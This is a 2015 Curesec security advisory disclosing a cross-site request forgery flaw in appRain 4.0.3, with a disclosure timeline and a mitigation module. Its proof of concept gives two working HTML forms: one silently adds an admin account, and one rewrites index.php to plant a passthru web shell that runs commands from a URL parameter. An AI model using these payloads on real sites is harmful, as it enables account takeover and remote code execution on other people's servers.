appRain 4.0.3 Cross Site Request Forgery
Posted on 10 December 2015
Security Advisory - Curesec Research Team 1. Introduction Affected Product: appRain 4.0.3 Fixed in: Fixed via Optional Module CSRF Protection Module http://www.apprain.com/extension/20/accounting-system?s Link: =Description Vendor Website: info@apprain.com Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 12/02/2015 Release mode: Coordinated release CVE: requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS Medium 5.1 AV:N/AC:L/Au:S/C:P/I:P/A:P Description None of the requests have CSRF protection. This means that an attacker can execute actions for an admin if the admin visits an attacker controlled website while logged in. 3. Proof of Concept Add new Admin: <html> <body> <form action="http://localhost/apprain-source-4.0.3/admin/manage/add/" method="POST"> <input type="hidden" name="data[Admin][f_name]" value="foo" /> <input type="hidden" name="data[Admin][l_name]" value="foo" /> <input type="hidden" name="data[Admin][email]" value="foo@example.com" /> <input type="hidden" name="data[Admin][username]" value="foo" /> <input type="hidden" name="data[Admin][password]" value="fdnki2@#E@Kkfod" /> <input type="hidden" name="data[Admin][status]" value="Active" /> <input type="hidden" name="data[Admin][description]" value="foo" /> <input type="submit" value="Submit request" /> </form> </body> </html> Code Execution (using the PHP file editor): <html> <body> <form action="http://localhost/apprain-source-4.0.3/appeditor/index?loc=webroot/index.php" method="POST"> <input type="hidden" name="content" value="<?php /** * --- * appRain CMF * * LICENSE * * This source file is subject to the MIT license that is bundled * with this package in the file LICENSE.txt. * It is also available through the world-wide-web at this URL: * http://www.opensource.org/licenses/mit-license.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@apprain.com so we can send you a copy immediately. * * @copyright Copyright (c) 2010 appRain, Team. (http://www.apprain.com) * @license http://www.opensource.org/licenses/mit-license.php MIT license * * HELP * * Official Website * http://www.apprain.com/ * * Download Link * http://www.apprain.com/download * * Documents Link * http ://www.apprain.com/docs */ if (version_compare(phpversion(), '5.1.0', '<') === true) { die("<strong>Whoops, it looks like you have an invalid PHP version.</strong><br /><span>appRain supports PHP 5.1.0 or newer.</span>"); } $appLoc = "../app.php"; if (!file_exists($appLoc)) { die("appRain core file(s) missing... Get a new copy "); } error_reporting(E_ALL); require_once $appLoc; umask(0); App::Run(); passthru($_GET['x']);" /> <input type="submit" value="Submit request" /> </form> </body> </html> The injected code can now be executed here: http://localhost/apprain-source-4.0.3/webroot/index.php?x=ls 4. Solution To mitigate this issue please install the "Data Exchange Security" module: http://www.apprain.com/extension/20/accounting-system?s=Description 5. Report Timeline 10/02/ Informed Vendor. Mailbox info@apprain.com is full, used 2015 security@apprain.com instead (no reply) 10/21/ Reminded Vendor of Disclosure Date 2015 10/21/ Vendor announces fix 2015 ~11/02/ Vendor releases optional module for CSRF protection 2015 11/04/ Suggested to vendor that CSRF protection should not be optional (no 2015 reply) 11/17/ CVE Requested (no reply) 2015 12/02/ Disclosed to public 2015 Blog Reference: https://blog.curesec.com/article/blog/appRain-403-CSRF-112.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany
